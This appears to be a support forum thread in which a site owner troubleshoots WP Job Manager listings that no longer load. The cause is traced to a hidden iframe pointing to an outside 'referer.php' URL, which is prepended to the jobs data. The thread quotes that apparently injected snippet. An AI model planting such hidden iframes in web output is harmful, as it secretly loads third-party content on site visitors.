WP Job Manager not loading

Hi,

We use WP Job Manager to list our jobs, but the job section is no longer loading (https://framexec.com/welcome/current-vacancies/). I think this might be related to the latest X update, as we haven’t made any other changes that might affect it. We haven’t added any new plugins or changed the jobs page.

Any ideas what might be causing this? Thank you in advance!

Beate

Hi Beate,

There seems to be a Javascript error caused by the Autoptimize plugin.

Kindly try clearing the plugin’s cache and if the issue persists, you might need to change some setting in that plugin especially the Javascript code minification as incorrectly doing it might lead to Javascript errors.

Hope this helps.

Hi Jade,

Thank you for responding, I’ve tried clearing the cache, changing the settings, and also deactivating Autoptimize (and clearing the cache again), but none of these made any difference. Any ideas what else I can try?

Hi Beate,

I still see that you have Autoptimize plugin enabled on your site. Disable and CSS/JavaScript autominifications and then disable your Autoptimize plugin as well, so that we can see what other issues are related to this conflict.

Then disable your child theme by activating your parent X theme again and see if you have any issues related to your child theme customizations.

Also disable all the other 3rd party plugins except Cornerstone and test your issue further to see if you’re having any conflicts with your 3rd party plugins.

If you have added any custom JavaScript codes into your site’s custom JS area, you need to remove them as well and test your issue.

Hope that helps.

Hi,
Having inspected the page with Autoptimize disabled, I got the below:

parsererror: SyntaxError: Unexpected token < in JSON at position 0 ajax-filters.min.js?ver=1.31.3:1

I’m not a developer, so am a little lost as to what this means!

Hi There @boera

Upon testing, I see the following error now.
parsererror: SyntaxError: JSON.parse: unexpected character at line 1 column 1 of the JSON data

From the following file.
/wp-content/plugins/wp-job-manager/assets/js/ajax-filters.min.js

Please contact your plugin author to resolve this issue further.

Thanks!

Hi,

Having investigated, the plugin author says the background jobs data request comes back and is prefaced with this:
< iframe style=“visibility: hidden; display: none; display: none;” src=“http://advancedautointel.com/referer.php?id={A175CE52-0861-4812-8502-ADBE3FEF41BD}”>
That invalidates the jobs data and prevents WP Job Manager from being able to display the job listings.

However, I don’t recognise this bit of code at all, and don’t know how to go about removing it. I’m panicking a bit that it’s a malicious plugin or tracker! Any help greatly appreciated!

(Meanwhile, and I’m not sure if this is related, I’m also having this problem: https://theme.co/apex/forum/t/cornerstone-preview-loading-but-no-editing-function/47313/4. I’m working on setting up a staging site for this.)

Hey Beate,

This is not related to the other thread. Please check your plugin’s settings. The theme could not alter data or settings of any plugin.

Regretfully, we could not help with third party plugin issues. Please continue asking the plugin author what else could cause this issue with his plugin.

Thanks.

Hi Christian,
Thanks for responding, and for helping - I realise this isn’t really your responsibility. However, the above code doesn’t belong to the plugin, hence why I’m asking. How would I go about deleting it?

Hi Beate,

The above referenced code is not related to X theme. I would suggest you to disable all of your 3rd party plugins except Cornerstone and see if that is coming from one of your plugins.

Also you can try searching your database to see if you can find any information with regard to that URL. Since the issue is not related to X theme, you will have to troubleshoot this issue further on your own.

Thanks for understanding.

This topic was automatically closed 10 days after the last reply. New replies are no longer allowed.